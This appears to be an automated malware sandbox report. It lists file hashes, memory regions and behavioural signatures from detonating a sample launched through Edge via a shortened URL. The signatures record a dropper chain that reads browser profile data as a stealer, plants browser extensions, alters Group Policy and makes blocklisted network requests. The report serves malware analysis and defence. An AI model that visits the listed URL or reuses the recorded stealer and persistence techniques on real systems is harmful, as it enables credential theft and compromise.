SHA512 87ec96bebafcd07d698142140f9ef78a328219bb6dfaf08f9d38a9e0a7c798ce9188630ff9e94798fbdb5f8e79427a76f97554635f036cff4a4c6091e5c8a9f6

memory/3824-435-0x0000000004D70000-0x0000000004DA6000-memory.dmp

memory/3824-436-0x0000000005440000-0x0000000005A68000-memory.dmp

memory/964-439-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/3824-440-0x0000000005BD0000-0x0000000005BF2000-memory.dmp

memory/3824-447-0x0000000005D50000-0x0000000005DB6000-memory.dmp

memory/3824-446-0x0000000005C70000-0x0000000005CD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pn2x3gk4.xu0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3824-452-0x0000000005EC0000-0x0000000006214000-memory.dmp

memory/3824-456-0x0000000006350000-0x000000000639C000-memory.dmp

memory/3824-455-0x0000000006320000-0x000000000633E000-memory.dmp

memory/3824-466-0x0000000007B80000-0x00000000081FA000-memory.dmp

memory/3824-467-0x0000000006820000-0x000000000683A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe

MD5 b22ba99456c105c277eb9056ca3f3485
SHA1 0db7280440aca3555f22a6ce8e6c4a7a0e38f142
SHA256 f86514113851b00bde75908f84847837191cf3de0548b2f478601707600f5000
SHA512 0a41feefb24c7bef8b04803eff1fedfb7a9775e63c6f5080c624eaec46e48dd8340b33df5c15a17245a6627f74994b2c22aa4a9eaf0f6b029d4891e66792b965

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e31751cf53c2eeb7cf219679ec9fa1a
SHA1 e19edb85e6919e2a2bfbcea9b5e092c29ec4faa1
SHA256 d10250aeec7a076d08a199a8df357f8a6655e5efbe8daf82c748ace720bf0670
SHA512 34a0191964e175ed28ea378e2b5e98f7b054735fd5fa786b52ae58b27bae0fdae74612e94bad03d4eeaaaef1f5b4aabeb939d43f31a9287b38d768184c1e1b5d

C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe

MD5 553b6c56a9090c2dd059791647c7d7aa
SHA1 ae9dc48e7383afa40ffca2c4ba613bf84c34d91b
SHA256 b1a5f09f5cff6690621ea05586d725704680ae9f4d75e0a6f92d21f623629cb9
SHA512 10f0ee08abcf5bee10053339b20fe7272f6ad36e6623e6550fb60e082d884421fc91bd4f1e1da70e69e72e4a8a2f8f37e110861db33db3bdaacf1de7c697dbf3

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe

MD5 9f1b088ecc5e2f36939797060e8f5956
SHA1 78adf95b81e539d1450c61a8d135f5f836bcd4a9
SHA256 1caa0f7f2913218f5bcd069a52aad482396914780d89f77c6610b70b36dc1e13
SHA512 6bd73db75e7c7493ac6e03e745385641c4eccaeb1d8e96a2b157e1d4043d42990a05edd6702f28e25d4a25d4e39295739f1a6a6ccf89e629f6010ee8ebd66212

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2407141759103124964.dll

MD5 82234053e684a16ea0b40a7f208f3233
SHA1 00381b28887a12f9ef8ee51cdbcc4320679ae88b
SHA256 23bda6025409f7e0a044b10644f4bace9772426312a969552931291306917c23
SHA512 be3235cc7d6ed941ced36cdc43a87ffae3b5163cacc12c2cbe6f320b6469d1c16d0bf2e42558df504d2c1a12d0234cfd187438830a59554696864a234de5f357

memory/4956-496-0x0000000010000000-0x00000000105E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 0c0f66b2ab984c0ee90669105b08dafd
SHA1 df36bce93113a725967f8bee92eff310ef8515ef
SHA256 843727a314b643126829964c84628b350f8759d4a0e91985fe18c66114863b67
SHA512 8a409111da2c23f918854c74a2b81fee51d3997589423524d814edd87b5e13034af73c76ab2edfc143969e3606ea8ef5592ce75747baec00979922a2016a3f0e

memory/2192-538-0x00000000058B0000-0x0000000005C04000-memory.dmp

memory/2192-540-0x0000000005F80000-0x0000000005FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 662958aed651fcdc2c58e3791e4e8066
SHA1 788c303f5b89ae28767a6c440b7841ad7f457aa9
SHA256 59f795f1d2dadb388eb7ab7102d91e7dc9e04581db99dc262a2becae03a1bd6d
SHA512 ed666099a3f39288dc389685b0855eef9157d0cb6c75ff1ae97d414f4b3add0cae9e0570b981a4bb0d77cfce52026dd237eb3e5ace9283d77695c3478868077f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 062aa1cca93a5c3fab4f4234320ef570
SHA1 826f4283fbece0b7c450bfbb696a5b8bb628774f
SHA256 72c8e072fef76d68082a3c0a25821b8fabcd17f8c2e24de58be57064ecf97226
SHA512 dc8f2640c001c57592b5e649dc4c6b7d47159ecbf0eb3b438d9138792a50fba135222f89a8de7c164d3ca85491f5f3d93fc366d2fb38f65bc2b9fde87e694836

memory/964-588-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\additional_file0.tmp

MD5 dfe86cd1ab9fe5055dba3ead830574f6
SHA1 800ba6757bf301a918a800ce15a3853e3941e019
SHA256 f9cdff6fea65207cde93c637cca4b92939359ede3ac7337c2048e076085e7e5f
SHA512 d3d363a221a3fa7a010194965cb8cc7210aa17d81be094a3e8ee89bb2de684c3b874ce1c6c55e8109091a849874d05c1bae132d450dabe2597167782d0063570

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe

MD5 a8c564c798ae8160230297d361952dd6
SHA1 34a45ee9eb7733ae9afbebb9f2951288a27f9df5
SHA256 3f48e5331890159921f7b65103c4b06bbf08552065718313761647d1648f8a64
SHA512 141ac3356a2fee32121231308cdd8afa5f76695185d66bba9fa977b66e5c6bad8bd4ea4656acdc743cd6b6f85c28a16626ab07f8b2c72652de82b4fb21c0bb54

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\dbghelp.dll

MD5 eeb07dc97790e8b075d6938759fe6ee1
SHA1 afb099be8ee28fef6488b5d253ba910b081a3b1b
SHA256 2808772ce1653cdf659f4781c718a9dd6f3ac547d52a1080462487baccaeaf78
SHA512 e541d839562c5045b5af0cc7ad2129393383df3fc528193cdef1a31ded4e894ffb8a02d34a009b3d6543d4987616534caaefa130a2b55ea73baf37ee0a294980

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\dbgcore.dll

MD5 ff0364394f7bc74d0c68040a5fbcda6f
SHA1 d19ce25e7d0e3043c377c5770b0f20cb42bd0295
SHA256 3bd944ca30b77f9ce8a1f503a7ee0dbcb77b92ae9fcd68907abe0ef2e9275053
SHA512 0676de1a65cc9c209f544e921f45c5eb8c5d42fb391ae1f370b0a2bedd26740f75f32ea5f17497d86e03edd6cf281ca51a7a54380a82de152d0e25a28297ccfd

memory/964-651-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 9d53fdc5e5f695bc38e413cb85857158
SHA1 4c32737b58c36b8bc334029c5cde24214f5b696e
SHA256 6f7b13920e81081b6af2d7f3b79a33694fda5fd7d92b4e6cc7981fc5c2354c1f
SHA512 4e2ca265fa02930a059d813f9c42a9621347e4e8744a41801366697188e35e20de00a927d024a8f52fa9009bfa924d2335d7794d29744a6ccc082323cfe35527

memory/964-663-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/964-666-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/2996-668-0x0000000010000000-0x00000000105E5000-memory.dmp

memory/1572-677-0x0000000004CD0000-0x0000000005024000-memory.dmp

memory/1572-682-0x00000000054C0000-0x000000000550C000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/964-687-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 38ecdf87cdc98ffafab8351b67ac2bb3
SHA1 2316d58109dac1de17b3eb3032fff3399c14fc8c
SHA256 fdc25f6de4163e6f210221bf5963d058ca90baeb610333384f73eeeb1cc8b348
SHA512 ca5eddfc85b545713a57ad1c7341fb6d7860ab062791e0b8367444a2f9fc02c429f944575a91bb70203efbcdbf8dfda067c3ac99e82e7c226ca3989205520b6e

memory/3456-703-0x000001DE781F0000-0x000001DE78212000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 569bae0921a007db4ffa1e47861ac146
SHA1 3978bcc268d43b034a1e448ae615765996dca9d0
SHA256 5f68fde312a0aff00212e64b193b7197720af9746cb4eacd7a8bad3ab27e55ee
SHA512 2e4ad1c5fd9420f76e19ad77e09e7ced436684a8382194ab41ce33fff6ce786cc24e47cc620d27fabd36a51ec0e70808cc50db5f5eab28ab6f2940a16ebcc6c9

memory/2276-716-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/964-717-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/964-733-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/2728-734-0x0000000010000000-0x00000000105E5000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6cffd6d0d43a457e9b4f0b242e90c70
SHA1 9f9e5d9f163e3185a499ba7c99227ec800900bf7
SHA256 d00357e974f42f5b090f08ef6eef54e06d84ce1cde3f881a28afc6da8108763e
SHA512 6a64771bc1085461c9d4c8b1ca60716817243e6a09e5d2ead60df5a248999bc3713b5be623981fb3dc41ccdefc73ae3c8cf2bbc3ed2f98bbc4d72a7579737a55

memory/1388-749-0x0000000005100000-0x000000000514C000-memory.dmp

memory/2728-757-0x0000000002570000-0x00000000025F5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi

MD5 f9b907a93322e40aff0265959dfde2f1
SHA1 7d837b9a2264d5a535e3f93185a675b03ec3ddf1
SHA256 bf71cb26369f668d7e87ede5be5f73836caf82fc0f8072f67266a890bad91d8a
SHA512 fe65cb0f005cb1d3395232dcc84fb04de1b478c376552fa8da9c2e6f40c7d48223388faac414b66026451200aa259895746a477f6bb607f029dba3b08b05f298

memory/2728-800-0x0000000002B30000-0x0000000002BA8000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json

MD5 33292c7c04ba45e9630bb3d6c5cabf74
SHA1 3482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA256 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA512 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json

MD5 5c5a1426ff0c1128c1c6b8bc20ca29ac
SHA1 0e3540b647b488225c9967ff97afc66319102ccd
SHA256 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA512 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 923e6b6c5fe6bc5e0feb4f68e8749de1
SHA1 6b3dc8751c7f31c316bb1ac7b52609984d1c4acc
SHA256 dc5882f19ceb28ea5b8ab9fe807547c167249eb81027ba0a419917466e53e49a
SHA512 4eda156b14a010fcf289a1921584fc53fd294e55ef502802733e1349624a675250d975084ff449b564533d7ba1073bae3f088820d7ed5ca9b6216e62f998c2d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json

MD5 a14d4b287e82b0c724252d7060b6d9e9
SHA1 da9d3da2df385d48f607445803f5817f635cc52d
SHA256 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152
SHA512 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d59e59d70987cbf3eb8d34776f9aac62
SHA1 705c6cb68764a72157361435fabed9d4f45dee37
SHA256 76e4a80736de36c6ec852fb65fc70e711376a141c7c713fa1a51456c84ef8b40
SHA512 9a3930726795ea8d73f62939a22cd2ce4bd53451ad755b8af953c559827d55cb5bbcda107efcb634b8abddbf8ade378d259f2b02c1102f1aac63c7ac3bff71b7

memory/964-1125-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/2728-1128-0x0000000002F30000-0x0000000002FBA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 38a3f91b6394a926f7c32c72e34c071e
SHA1 292ad29bb05d8e4f1a02fcf941d510269a0e1d70
SHA256 08e44100e05f6775b9c96ca932b7ffd940e17620b146bf8b7900ae496c32959f
SHA512 bf417f61e802f4f65e5f1b42e8aa5df1e2800b955f4886c33ac671df4c0e16a96a18ba25c92e2b93b3747af997e87cc580171e363ca5f655ac4f097c3f4aa469

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\prefs.js

MD5 0c847470fe4242fe9d2bd61c2f81a422
SHA1 e34384b6216497f77e94c9a8e135fcc1413aadca
SHA256 66668ca875ff7174fe4f878b539f7215950827d49bb590b660557163a038ed7e
SHA512 97e0368ee1cfeada26a483a3aaf0d17d676686cf083f7c06d8f0414829fd85dc47e2222ae734711725bf3d847c1396441cf83aa5ace32cf4534dad30b0feb2e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a77ec609c22853cc98dfaf525e7d75ff
SHA1 57784ca68d5daf26f5398c92a492c978035e2c33
SHA256 606cc23ff372865333d028a148e89bc8109c299e4fd6a37386883abb2268deb6
SHA512 30e4121b043a5f24e3618dd0ae73e1d8271f991bb58cb24f24bf6fc808f1c2fcc7f91d0a60579e7fded8d161562e67bbcabc2a297920e8f6e56feb3f68ee93df

memory/2728-1142-0x0000000002FC0000-0x000000000308C000-memory.dmp

memory/4792-1197-0x0000000001280000-0x0000000001865000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 79a4409862f533a1bbd40b21afe0ce7e
SHA1 b55194b947bca193d0b9375901720a65b9115226
SHA256 9f49bbcfb758aa115519e2192503784cec3ef997cb655c1532bdb53834211c7b
SHA512 0a1ca28d8c837d019cb2bcdcad005c80c6231ce4b29649eb734e40d2b072b9d22ffbc3d83a317e2abda3549d888587251882df053ab4380f3f9eadff44f51c55

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0248f0322a10a8e1961ceb6a54378ebc
SHA1 affa90500a7993089a4f8afa9a9c78bf2eb0d2ae
SHA256 d376c2cab1a88ad8e93459cff1818d993095096a9a03e7133d8f6dd40874ac9c
SHA512 cc23807a9fc73d9cae1134d29b785098badb9252b31e8e1a772429bfbe0fa3912ac64283ed5c447f4f56fe0715edbde1700f57f9a1402088b66410964c3b49fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e113076144adf3e86592b41275330ff7
SHA1 a6a809cc555a9a4dd485c8a1b47e05ec1268abfc
SHA256 6ba6dbadad2b0a292c8f780f97c05f7ec14d30939ededcd8a21ffa2ab9754760
SHA512 527c10e424fbdb1bf8ac3ce9063c9e188b45a31eb49162a9becd2907961e4cc0238095db741401cd0fe63badc234a069aeef0b574a5cee9ce37527f8e88fa028

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 380e3d96f6ad1fd4b3fcdf1019c4a82b
SHA1 564e473ef9bcbb5cb60bc884189907db1a4bb73f
SHA256 906d6aba29066c903da1b09f6e28e6f6a416823c15041913fd0d57cad48219bf
SHA512 2517f80e9b6e30da67bdd3c08d9f9e6d428226dcc875c3343ae3ed22f86c300bc376c3f64cbb55f1773348424f3af6c48637671f577adead3952507ba252dbbe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 dc5c8900eb13278815edcc757788597b
SHA1 bc4d39ae57732c3867db89077a1a907d9e918082
SHA256 4f09b851d4e3818d837a7bff9c12ec1a18510bb130e3be9ff7287b1f1e6006f8
SHA512 b5ae4b7726a4523aab55da0e159793a2bb298f5df815467976a7341f6aa99a3580c085e1e4cda62190c0e4704cc98c736fd4cf3e06eb39808b5594957e7c3408

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8f93a2370966bd5488774269635ab440
SHA1 1643cfda17f62365c5b4322ac6bf06c0c2baaf0e
SHA256 05b3795b15744b145098b247b05c820e90015ffebd4982ce9ae34371adffa074
SHA512 98eae70d54300d0b199dd0714bfea1df52acaff3fe638a2e16fc27f91eda18983b28dda13667ace3dfb4ec486bbcab4ce72734fcd0d630d6fd23c0e513f36e58

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-14 17:56

Reported

2024-07-14 18:01

Platform

win11-20240709-en

Max time kernel

300s

Max time network

301s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic5

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\hMiQKFvmPLjeC\mlDSpAv.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\hMiQKFvmPLjeC\XoErYOe.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\ezMWJXFFLyUn\UwKjjcK.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
